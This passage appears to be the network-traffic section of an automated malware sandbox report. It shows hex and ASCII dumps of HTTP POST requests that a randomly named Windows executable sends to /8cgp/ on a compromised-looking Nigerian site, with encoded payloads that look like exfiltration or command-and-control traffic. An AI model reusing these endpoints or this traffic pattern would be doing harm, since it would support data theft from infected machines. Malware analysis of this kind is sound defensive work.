                                                                    Origin: http://www.ogunlewefamily.org.ng
                                                                    Referer: http://www.ogunlewefamily.org.ng/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 44 6b 75 53 66 50 4f 37 4a 7a 70 48 2f 46 4d 73 32 4b 6b 38 6c 4f 43 51 65 5a 53 76 43 6c 6e 33 35 51 52 4d 33 68 48 6c 52 63 66 38 61 57 68 77 36 43 72 67 59 79 50 67 46 35 33 2f 4e 50 39 2b 32 2b 71 4a 63 71 4d 4f 33 55 38 39 42 6e 4a 34 6e 57 36 72 6e 77 2f 31 39 58 36 49 33 48 38 6f 45 73 48 58 2f 68 57 67 53 77 6e 5a 50 36 69 7a 78 38 34 71 79 74 6b 42 64 61 5a 39 38 51 78 77 42 32 31 34 34 62 37 49 36 6e 69 78 75 72 57 4e 50 47 45 6e 4b 37 30 64 71 66 49 45 6c 53 4c 63 77 49 30 48 37 62 52 34 33 56 2f 52 59 67 33 41 4e 70 63 79 6e 30 52 51 31 6e 65 6c 45 47 74 69 52 76 42 78 56 2b 4b 64 41 78 71 4e 49 41 38 65 4a 62 44 51 32 67 4a 6e 47 75 44 33 66 6d 67 6b 77 45 59 78 54 66 56 2f 74 70 47 4b 39 48 2b 59 68 53 57 2b 4e 47 79 69 47 50 50 61 63 67 4a 38 6e 70 42 67 4b 50 70 53 42 67 65 70 55 2b 6d 72 4d 6c 6b 50 36 36 4d 6f 6b 78 6a 34 4f 65 6e 48 7a 43 47 43 48 4d 38 2f 56 79 39 50 68 31 30 50 51 38 73 71 4e 37 6e 54 57 65 7a 72 4f 4f 72 75 4a 39 74 57 53 73 4d 63 46 6c 47 55 61 5a 37 57 33 41 66 41 35 6c 71 68 70 4f 79 65 41 4b 41 4a 4b 62 62 33 32 45 74 2f 72 65 6b 4f 68 30 61 6a 42 6c 31 72 56 6b 30 74 34 62 71 4c 70 36 57 31 37 7a 73 41 52 78 4c 43 34 4e 31 32 63 2b 72 78 6e 4a 48 58 35 75 32 33 70 68 36 44 69 39 42 6a 36 66 2f 6d 6a 79 54 68 53 31 69 6a 49 70 51 74 57 30 39 47 32 62 61 37 64 56 53 49 2f 37 6b 48 70 49 6a 68 4c 6a 39 72 61 6e 36 53 35 37 6e 43 53 59 79 30 72 47 42 47 6d 52 63 5a 35 64 52 52 6a 6e 42 31 4a 57 6b 6c 4d 39 4c 53 33 4a 4e 50 77 35 72 36 64 58 64 65 39 65 36 67 76 6f 53 41 59 56 70 53 71 7a 77 52 71 76 49 73 47 71 43 4a 38 4f 4c 5a 32 5a 59 3d
                                                                    Data Ascii: Xh9lX=DkuSfPO7JzpH/FMs2Kk8lOCQeZSvCln35QRM3hHlRcf8aWhw6CrgYyPgF53/NP9+2+qJcqMO3U89BnJ4nW6rnw/19X6I3H8oEsHX/hWgSwnZP6izx84qytkBdaZ98QxwB2144b7I6nixurWNPGEnK70dqfIElSLcwI0H7bR43V/RYg3ANpcyn0RQ1nelEGtiRvBxV+KdAxqNIA8eJbDQ2gJnGuD3fmgkwEYxTfV/tpGK9H+YhSW+NGyiGPPacgJ8npBgKPpSBgepU+mrMlkP66Mokxj4OenHzCGCHM8/Vy9Ph10PQ8sqN7nTWezrOOruJ9tWSsMcFlGUaZ7W3AfA5lqhpOyeAKAJKbb32Et/rekOh0ajBl1rVk0t4bqLp6W17zsARxLC4N12c+rxnJHX5u23ph6Di9Bj6f/mjyThS1ijIpQtW09G2ba7dVSI/7kHpIjhLj9ran6S57nCSYy0rGBGmRcZ5dRRjnB1JWklM9LS3JNPw5r6dXde9e6gvoSAYVpSqzwRqvIsGqCJ8OLZ2ZY=
                                                                    Apr 24, 2024 12:30:14.935365915 CEST1289INHTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:30:14 GMT
                                                                    Server: Apache
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    Link: <https://ogunlewefamily.org.ng/wp-json/>; rel="https://api.w.org/"
                                                                    Upgrade: h2,h2c
                                                                    Connection: Upgrade, close
                                                                    Vary: Accept-Encoding,User-Agent
                                                                    Content-Encoding: gzip
                                                                    Content-Length: 7038
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 e5 3d 6b 73 db 46 92 9f a5 5f 01 c1 15 8b dc 00 20 08 3e f4 a4 52 b2 2c 3b de 8d 2d 97 2c 5f 6e 2b 4e a9 40 60 48 c2 06 01 04 00 f5 58 45 3f e8 fe c6 fd b2 eb 9e 19 bc 07 24 24 4a d9 6c 8e 65 53 c4 4c 4f 77 4f bf a6 e7 45 1e 6e bd 3e 3b b9 f8 e7 c7 53 69 16 cf dd a3 cd 43 fc 23 b9 a6 37 1d c9 c4 53 3f 7f 92 b1 8c 98 f6 d1 a6 04 af c3 39 89 4d 00 8d 03 95 fc b6 70 ae 46 f2 89 ef c5 c4 8b d5 8b db 80 c8 92 c5 9e 46 72 4c 6e e2 0e e2 3a 90 ac 99 19 46 24 1e 7d be 78 a3 ee ca 79 3c 9e 39 27 23 f9 ca 21 d7 81 1f c6 b9 d6 d7 8e 1d cf 46 36 b9 72 2c a2 d2 07 45 72 3c 27 76 4c 57 8d 2c d3 25 a3 ae a6 27 a8 5c c7 fb 26 85 c4 1d c9 81 e3 4d c7 a6 f5 4d 96 66 21 99 8c 64 e4 73 bf d3 f1 a7 0b cf 25 d7 64 62 ce 1d f7 56 f3 c3 a9 e6 4d 3b 37 73 37 0c 2c 2d 98 05 09 a2 d8 89 5d 72 f4 d1 9c 12 c9 f3 63 69 e2 2f 3c 5b 7a f9 62 d7 e8 76 0f a4 33 8e 44 7a 43 b1 1c 76 18 f4 66 ae 27 db a1 3f f6 e3 68 3b ed c7 f6 dc bc 51 9d 39 20 54 83 90 60 3f f7 5d 33 9c 92 6d a9 03 0d 53 be b7 6d 2f 42 80 09 89 ad d9 36 e3 7d bb 86 ed 66 4d 27 c0 40 a4 4d 7d 7f ea 12 33 70 22 cd f2 e7 a5 96 b2 e9 c6 24 f4 cc 18 b4 16 83 ee a0 20 08 5c c7 32 63 c7 f7 3a 61 14 7d 0f 02 82 2a ec e5 48 2e f5 5e 7a 19 9a bf 2d fc 03 e9 0d 21 76 5e da 51 ad b8 27 00 d9 91 9f 83 87 13 7f 3e 07 69 47 0f 60 c6 e2 4d f2 5c 45 56 e8 04 31 e7 83 9a ef 57 f3 ca 64 a5 60 21 9d bf 49 87 5b bf 9c bc 3e be 38 fe 45 fa 5b 67 f3 da f1 6c ff 5a bb bc 0e c8 dc ff ea 7c 22 71 0c d6 17 49 23 e9 4e 1e 9b 11 f9 1c ba f2 3e 67 e3 4b e7 4b 27 d2 ae 91 fa 97 0e b5 87 e8 0b f0 10 92 2f 1d da f8 4b a7 3b d0 74 ad f7 a5 b3 63 dc ec 18 5f 3a b2 22 03 03 d0 5e 0b bc 29 3c 44 57 d3 c7 e1 83 86 14 1b fc 3d 65 08 e1 13 3e fb 8b d0 22 f2 fe 9d 0c b6 0a f2 a6 cd 38 7e 8a 5e 28 b7 2f 9d eb 40 75 3c cb 5d d8 48 f1 6b 44 0b 68 5b 15 f4 49 a0 db da dc f1 b4 af d1 0f 57 24 1c 0d b5 81 66 c8 f7 f7 07 20 bc 2d e9 62 e6 44 d2 c4 71 89 04 7f cd 45 ec ab 53 e2 91 10 68 db 28 cf ad c9 c2 b3 50 ef 2d 47 f1 da 77 57 66 28 f9 4a a4 90 83 a4 5c b2 5a a4 7d 17 87 b7 b4 2e 1e dd 45 8b 00 c3 c6 05 89 e2 68 9f 28 b1 33 87 4f e6 3c d8 6f 79 e4 5a 7a 0d 88 db da 95 e9 2e c8 d9 a4 d5 be 3f 88 48 14 01 9a 4f b1 1f 82 c0 34 88 48 ef a0 db 2d 5f f9 fb a7 b3 0f 5a 14 87 a0 3e 67 72 db 8a db ed 7b 90 88 35 43 72 f7 f7 29 f9 a0 05 34 90 35 a2 59 d0 d5 f0 9c 58 71 4b 57 74 05 9e 4d 0f 2c 45 63 81 2a 7d 9c 11 67 3a 8b db 50 00 bd 76 2f 40 a1 ad 18 c0 f5 f6 01 eb 00 72 f9 d9 f1 e2 9e 71 1c 86 e6 6d 8b 68 53 e0 09 b5 09 bc 9b 4d 50 6b 36 00 b6 95 70 d4 5a 83 27 8f f2 a4 3c 15 37 ed 83 90 c4 8b d0 93 62 8d 80 11 dc b6 52 bd 82 f8 da 77 bc 92 8c 46 a3 f0 97 f8 d7 fb 76 26 e0 45
                                                                    Data Ascii: =ksF_ >R,;-,_n+N@`HXE?$$JleSLOwOEn>;SiC#7S?9MpFFrLn:F$}xy<9'#!F6r,Er<'vLW,%'\&MMf!ds%dbVM;7s7,-]rci/<[zbv3DzCvf'?h;Q9 T`?]3mSm/B6}fM'@M}3p"$ \2c:a}*H.^z-!v^Q'>iG`M\EV1Wd`!I[>8E[glZ|"qI#N>gKK'/K;tc_:"^)<DW=e>"8~^(/@u<]HkDh[IW$f -bDqESh(P-GwWf(J\Z}.Eh(3O<oyZz.?HO4H-_Z>gr{5Cr)45YXqKWtM,Ec*}g:Pv/@rqmhSMPk6pZ'<7bRwFv&E
                                                                    Apr 24, 2024 12:30:14.935463905 CEST1289INData Raw: 22 e0 e8 da 41 f1 03 b4 05 16 25 4f 5c 73 2a ef f3 86 88 46 fe b2 b0 77 7b 16 bc 4f 26 bd 2f 8b 09 d1 27 5f 16 86 ae db f0 3e 34 77 58 89 5c 0b 36 2e 80 b5 7f d8 ea ee 6f 15 d1 da 13 33 f7 b9 27 97 ab 18 92 1c 40 fb e5 cb ad 32 67 7d 78 1f f7 75
                                                                    Data Ascii: "A%O\s*Fw{O&/'_>4wX\6.o3'@2g}xux;F wJ=sR2xt\Om3,=>INds o0g?F?6O/#N #,!hgoBj+w4(qZ2df5a
                                                                    Apr 24, 2024 12:30:14.935475111 CEST1289INData Raw: fc 01 37 fb d2 0b 9d be 0e 84 30 d6 ad e9 01 e0 c2 89 66 ea 34 44 37 7d 61 8e c7 bb 56 4f 0c 7e 3d 73 62 02 30 13 fa 12 c3 04 a6 4b d4 00 74 88 70 3b bb b6 b9 23 86 bb 72 ae 1c 5b 0d 09 38 d2 0b 6b 62 10 83 88 e1 dc 05 18 ad bf 88 78 03 10 9e 37
                                                                    Data Ascii: 70f4D7}aVO~=sb0Ktp;#r[8kbx7e<Ujcb:Mq}' HsT|gl[20wK%vwb-{=R,EK}:lXDfiV7Tc5T0vn[Vw0PvPoK]]]K,v^[]:0ISbJ
                                                                    Apr 24, 2024 12:30:14.935487032 CEST1289INData Raw: cd 02 ba 8d f7 fc 9a d8 a1 60 ab 6e 2d 96 9a 10 68 ea 8f 75 9b 78 eb 31 f8 10 4a 8d 63 55 7e 8f ef 29 d9 13 a0 17 d9 d8 ea ad bf f5 ec 6c 35 7e d1 18 2a da 11 5c 8b 0f 21 46 61 3e 50 de cb 5b 8b 6c 15 5d 2d cd 64 47 ef 09 e8 25 a8 96 d9 20 ee e1
                                                                    Data Ascii: `n-hux1JcU~)l5~*\!Fa>P[l]-dG% =!8O"(nEJ@+[JDnegw#_vp;i;Gc+gJTIfaO13hY89[%,99mwHITjf*TWZ
                                                                    Apr 24, 2024 12:30:14.935586929 CEST1289INData Raw: 20 bf 0b 7d 4c 73 28 f4 51 ca 26 ff 4e a4 3a f1 80 c4 63 32 57 07 7d 5d 2e 34 c1 d7 32 8a d8 4a aa c7 a7 ba e4 0a 04 a3 4b b4 8e 02 a7 9f 54 4c d5 e8 d2 c9 25 7e ca 55 b0 fb ef 2a 8e 68 b9 d2 99 3f 27 55 e6 58 67 e9 f2 11 04 25 0c fb 68 35 65 a8
                                                                    Data Ascii: }Ls(Q&N:c2W}].42JKTL%~U*h?'UXg%h5e_EF;+'R-j%,Y|#RhW%:`Dmij6yjr#xOb`oslum2;0{<n4^<b'u}OSd8OO,#qD
                                                                    Apr 24, 2024 12:30:14.935596943 CEST1004INData Raw: e0 60 92 34 f3 05 5e 2e 66 38 56 86 57 24 94 2c d3 c3 fb 2e 7b 07 31 24 97 20 bc 18 aa 68 80 ba f5 17 12 fd 95 9d 28 26 b6 26 5d 24 e5 10 dc 25 e2 00 58 08 f4 70 08 f1 af 88 8d 27 71 4d c9 76 26 13 12 e2 b1 65 9c e5 d2 6b 82 60 f2 36 c1 dc d8 56
                                                                    Data Ascii: `4^.f8VW$,.{1$ h(&&]$%Xp'qMv&ek`6V3"'avZR)xu|?=x?XjG@ja*5J!Ha3am2K"K8rYIJ>\tbEW]wr-279;`7:Q9{dGt 509


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    27192.168.11.205027267.225.140.26807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:30:17.193630934 CEST2578OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.ogunlewefamily.org.ng
                                                                    Origin: http://www.ogunlewefamily.org.ng
                                                                    Referer: http://www.ogunlewefamily.org.ng/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 44 6b 75 53 66 50 4f 37 4a 7a 70 48 2f 46 4d 73 32 4b 6b 38 6c 4f 43 51 65 5a 53 76 43 6c 6e 33 35 51 52 4d 33 68 48 6c 52 63 58 38 5a 68 68 77 39 56 2f 67 43 79 50 67 5a 70 33 45 4e 50 39 7a 32 2b 7a 4f 63 71 4a 37 33 57 30 39 42 77 74 34 6d 6c 53 72 74 51 2f 30 68 48 36 4b 68 33 38 38 45 73 4c 35 2f 6c 47 61 52 41 44 5a 4d 35 71 7a 67 66 51 6c 2b 64 6b 48 64 61 5a 68 34 51 78 53 42 32 34 31 34 62 33 49 36 69 36 78 73 66 2b 4e 4e 56 38 6e 44 4c 30 63 35 2f 49 48 77 69 4c 6c 77 49 67 35 37 62 52 6f 33 52 48 52 59 6e 44 41 4d 75 41 7a 6e 55 52 51 2f 48 65 6d 53 32 6f 72 52 76 64 70 56 2b 4f 64 41 33 75 4e 4f 51 38 65 66 66 58 54 78 41 4a 74 43 75 44 67 4e 57 38 38 77 45 4d 4c 54 61 74 2f 74 5a 43 4b 73 6b 57 59 74 51 2b 2b 41 47 79 6b 49 76 4f 47 46 51 49 74 6e 70 52 53 4b 4d 77 76 42 69 53 70 53 71 79 72 4a 45 6b 4d 35 61 4d 71 34 42 6a 58 46 2b 36 47 7a 43 58 64 48 4d 38 56 56 32 4e 50 67 46 45 50 52 39 73 74 4f 72 6e 55 43 75 79 70 48 75 33 30 4a 35 45 62 53 73 55 4d 46 6d 71 55 61 35 37 57 38 48 72 66 7a 56 72 72 68 75 79 54 45 4b 41 65 4b 62 57 63 32 47 42 4a 6f 75 49 4f 67 45 4b 6a 46 31 31 6f 65 6b 30 68 32 37 71 4e 2b 4b 57 31 37 7a 67 55 52 78 48 43 35 39 39 32 61 4f 62 78 73 2b 62 58 37 75 33 79 70 68 36 53 69 39 38 56 36 63 65 48 6a 78 4b 4f 53 33 4f 6a 50 37 6f 74 56 32 56 4a 77 72 61 36 5a 56 53 66 78 62 6f 51 70 49 75 75 4c 6a 74 56 64 51 4b 53 36 36 62 43 57 59 79 33 75 6d 42 42 79 42 63 50 71 4d 73 53 6a 6e 63 49 4a 57 34 50 4d 2b 4c 53 30 59 6b 70 76 4b 37 2f 4c 32 5a 73 32 38 4f 58 6d 62 75 31 51 45 64 48 35 67 6f 6e 74 61 6f 73 4f 37 36 49 73 66 48 45 30 2b 42 78 4d 62 69 6a 2b 6b 48 56 66 4c 70 6f 53 6e 42 57 62 32 7a 6d 45 2b 6a 7a 38 32 79 49 41 79 6c 73 79 43 74 69 45 4c 32 4e 56 6a 72 73 36 2f 68 52 73 72 55 72 45 37 31 6d 78 58 34 66 55 6b 65 62 58 65 50 51 4f 65 7a 6f 66 74 6c 4e 59 54 30 43 6d 43 35 4b 7a 51 53 55 79 38 75 31 61 70 59 58 41 78 57 77 31 71 56 41 30 2b 42 66 57 71 65 4a 4e 6b 47 58 59 4d 7a 56 65 72 6f 65 56 69 64 36 73 65 64 51 46 4b 6d 38 66 42 59 63 59 78 72 73 55 69 79 68 6a 67 54 36 66 47 34 45 43 77 31 33 74 43 6d 6b 47 32 6b 6f 6c 55 78 70 39 78 47 56 64 78 55 4c 33 45 47 74 33 76 6d 76 66 5a 41 5a 68 62 4a 2f 43 70 36 32 74 57 50 6a 6c 67 55 35 47 7a 61 38 7a 76 58 64 39 45 43 50 55 6c 59 68 43 79 44 68 71 6e 53 76 36 4f 78 37 30 79 73 79 4c 6a 57 62 68 61 71 30 78 71 75 38 2b 62 4a 2b 76 65 76 73 56 54 61 59 63 78 6c 55 62 54 4a 33 49 4f 65 47 2f 6c 39 6c 4f 68 75 50 55 67 63 5a 37 45 68 35 73 6f 69 37 46 73 55 31 34 6e 61 55 73 34 47 67 46 52 6d 36 46 63 57 42 63 63 77 79 4e 62 58 36 4f 4c 52 6a 55 70 57 4b 65 64 38 2f 6e 34 33 58 58 64 35 6a 75 62 48 63 50 65 61 6c 6c 39 69 71 68 67 2f 51 58 63 6d 45 78 50 46 66 51 6c 59 66 56 2f 34 6e 6b 7a 77 6a 6d 45 72 53 57 57 6c 78 59 4b 6b 6a 6e 34 38 5a 4f 68 50 66 43 50 53 66 42 2f 6d 37 30 33 6f 4f 50 75 43 65 52 79 6a 6a 52 55 2b 49 54 4f 79 38 68 6b 6a 77 35 4c 65 44 77 67 48 64 68 38 46 38 68 54 78 4e 45 56 4b 76 74 37 6b 43 4c 34 4d 6f 59 67 34 77 34 46 48 42 4e 5a 78 70 47 34 77 58 39 52 35 49 57 33 75 76 58 48 4f 71 4d 32 6e 6a 51 68 33 4b 38 38 30 7a 49 5a 33 45 2f 30 7a 43 4b 61 4f 71 35 6a 4b 62 79 55 63 53 4b 6b 32 45 50 75 69 61 32 78 38 68 74 72 48 51 6f 42 71 70 30 51 6a 67 71 73 77 43 4e 73 72 51 56 4a 43 62 38 4e 66 4b 76 4c 51 35 4d 2b 7a 4c 72 52 68 76 47 6e 53 32 70 66 72 56 43 57 2b 56 4b 54 4f 55 75 66 49 71 6e 5a 4a 5a 4a 78 42 55 48 67 36 6c 74 53 79 33 72 4e 55 38 6c 53 2f 70 2f 69 43 55 47 34 33 45 5a 53 48 51 66 4f 5a 67 39 41 43 50 74 6e 66 4f 4b 36 34 6f 46 57 45 79 6e 2f 6c 71 33 66 72 68 62 4d 44 39 33 44 67 61 72 38 73 58 54 2f 34 57 57 58 55 52 70 41 31 34 72 31 78 77 53 71 53 56 56 4e 65 35 58 76 59 59 6f 7a 74 4d 42 6a 67 43 35 33 48 70 79 53 6b 47 4f 56 30 4f 7a 54 37 59 6f 36 59 74 4d 64 76 36 51 78 4d 71 51 54 4f 37 4d 4a 66 4b 5a 48 73 75 2b 49 4c 4b 4a 44 72 66 6c 62 32 4d 63 54 6b 61 31 43 51 33 69 68 2f 36 67 38 52 43 42 44 5a 47 32 58 6a 4b 2f 33 32 48 4d 6e 36 35 41 66 55 66 57 54 4b 42 63 4f 6c 4a 71 64 64 2f 57 70 39 79 6d 2f 6a 4b 58 70 7a 34 5a 39 2b 2b 39
                                                                    Data Ascii: Xh9lX=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
                                                                    Apr 24, 2024 12:30:17.193727970 CEST10312OUTData Raw: 75 38 51 56 34 64 68 64 69 35 79 59 5a 74 41 31 44 36 58 4f 6f 64 43 39 68 53 6d 78 4c 68 78 36 79 36 57 52 63 57 46 76 64 37 66 30 41 4e 7a 78 36 56 58 4a 4c 59 4a 32 2f 64 4e 59 52 69 69 50 2f 46 70 61 6c 66 7a 65 64 38 6c 73 38 79 39 31 74 50
                                                                    Data Ascii: u8QV4dhdi5yYZtA1D6XOodC9hSmxLhx6y6WRcWFvd7f0ANzx6VXJLYJ2/dNYRiiP/Fpalfzed8ls8y91tP2RUxTJDDb2XE4bqYQWd7hgYDa/KSsK8rGU7v9yLR/aTpwjIhl6SIn9FGcsghkf9O+XvZ4lB0XsxAVFSkzuv3SFnAxBRBFkyNonEisLKxkr/YoNojvqQl7g/ui+FKFfA9nB4rEkbtUsW23qh34Z8lJ4nsuy0vmcXDE
                                                                    Apr 24, 2024 12:30:17.435544014 CEST2578OUTData Raw: 4e 49 38 68 49 49 39 73 6c 47 78 72 57 37 38 74 53 6c 69 31 6e 78 39 6f 35 69 72 6f 37 56 56 7a 32 66 72 76 71 66 79 6e 62 4b 43 4b 43 39 68 4c 2f 32 34 43 48 55 42 74 59 61 6d 45 4a 53 78 32 73 4f 58 73 2f 66 31 36 2f 36 38 4c 56 46 5a 38 4b 42
                                                                    Data Ascii: NI8hII9slGxrW78tSli1nx9o5iro7VVz2frvqfynbKCKC9hL/24CHUBtYamEJSx2sOXs/f16/68LVFZ8KBuKIKaXhGSS9NrvDkuhESh6cm15IknRy1xpPlPqOxx4zanyck9/qh84w352fPIaHKmjigVT2GszferAxufncI7YtKGTEw2XHv/1HgqA5CxKgKmQVbGDJlJoJZ8ymW59aCQyn0xrzS4nMEXwZkISuJxAolcl6j2jnzR
                                                                    Apr 24, 2024 12:30:17.435734034 CEST12890OUTData Raw: 70 72 6d 37 38 4b 39 4f 65 51 75 4a 37 50 4f 6e 52 72 73 42 32 54 72 48 6a 78 38 47 62 37 58 6e 49 4a 49 7a 77 6b 33 42 56 2b 4e 59 6c 37 31 70 78 78 67 4d 73 54 58 4f 78 61 57 2b 44 48 75 42 6a 36 66 68 47 4a 49 49 66 6d 47 71 49 37 31 75 56 77
                                                                    Data Ascii: prm78K9OeQuJ7POnRrsB2TrHjx8Gb7XnIJIzwk3BV+NYl71pxxgMsTXOxaW+DHuBj6fhGJIIfmGqI71uVwCqzErYoN5MrjP9vRKisFaf60Mobmmga7bkANxaA6pGao2U7ObxqZ/4tqC+xzW/ltS7PAe3wySeJmgNJ2VSbOKMdqidH7HNjWNGpxO3tqjXtwDJEwj5rg+RJSEI6+FBa4Xl0U1fd+KXLHYbru6r6kd/DURpheEvhjO
                                                                    Apr 24, 2024 12:30:17.436364889 CEST2578OUTData Raw: 37 44 4a 61 4e 32 74 71 4d 68 78 67 68 70 61 2b 4b 6b 46 6b 4b 6c 48 4f 52 4f 41 58 2f 7a 6e 6c 4c 78 4a 47 2f 68 6c 56 38 55 48 75 4c 38 4a 69 65 36 6f 33 41 77 78 42 7a 75 4a 74 65 73 4f 64 51 46 43 37 36 47 44 58 78 66 32 66 48 52 31 72 6b 6a
                                                                    Data Ascii: 7DJaN2tqMhxghpa+KkFkKlHOROAX/znlLxJG/hlV8UHuL8Jie6o3AwxBzuJtesOdQFC76GDXxf2fHR1rkjqP7iqQrRyH8YnLnGkqv+eWpTf72OrT0fNCE0Z+fJDZQzuGQNZz6s++VypdvsV4d9H2Zy4BE9yxKbTueNVZA31iCpocY56c4yYwshOd5PZyF2QT4GSeIzeJUN1Ve3SeTRb6h9ZuwuyvG17AdYSvv5eNX6vuxokdrCq
                                                                    Apr 24, 2024 12:30:17.436556101 CEST7734OUTData Raw: 69 42 2f 4c 73 68 30 68 53 78 79 65 4b 37 4f 45 4e 64 43 64 67 39 74 6c 31 6d 44 58 47 46 62 41 4b 33 65 31 4b 4c 41 45 4c 42 64 45 72 37 6e 35 43 46 33 2b 59 4f 4b 77 47 6a 42 56 73 59 4a 52 64 37 71 4b 62 44 55 6f 49 35 59 4b 65 46 44 70 2f 43
                                                                    Data Ascii: iB/Lsh0hSxyeK7OENdCdg9tl1mDXGFbAK3e1KLAELBdEr7n5CF3+YOKwGjBVsYJRd7qKbDUoI5YKeFDp/C7x0VqB1sh14Fd2sXJrkfWVeysdD/y8ujCuGLXggyLcAhWulFddbYap0aryHP8/4PeMtFmYASz75umKevPtVGlPG1Wk8ZpXp7aMVVV3t4bD0a0RkW1c2a+FnURN6nxPlJwYvp+hqUfdjHhOeOtUR3gkA0Cyh2ITauj
                                                                    Apr 24, 2024 12:30:17.677469015 CEST2578OUTData Raw: 48 69 53 30 47 4f 2f 70 6b 49 39 75 59 41 57 35 69 74 59 32 49 59 50 79 33 70 43 53 2f 61 36 75 37 38 4c 42 68 42 65 4c 55 2f 51 34 52 38 69 6c 76 79 73 39 34 4f 6c 45 66 39 39 2f 58 44 45 48 73 45 52 61 63 6f 61 4e 53 75 77 64 74 49 46 76 39 72
                                                                    Data Ascii: HiS0GO/pkI9uYAW5itY2IYPy3pCS/a6u78LBhBeLU/Q4R8ilvys94OlEf99/XDEHsERacoaNSuwdtIFv9r6XNoGj7WSedRuIi0CuoqRCNfmRlRtchQqE62fwZeOYPY/vAoSq5zz4LLbif0OmhqBjadEhTQgkUe3++DKVJ7yn1CDIFS3jM8L2O1uDCofh8ejsgULJxPJAC2PhUmduGJ6V7hoYokorVvI8apa/gdIjMQKuIeoa0UP
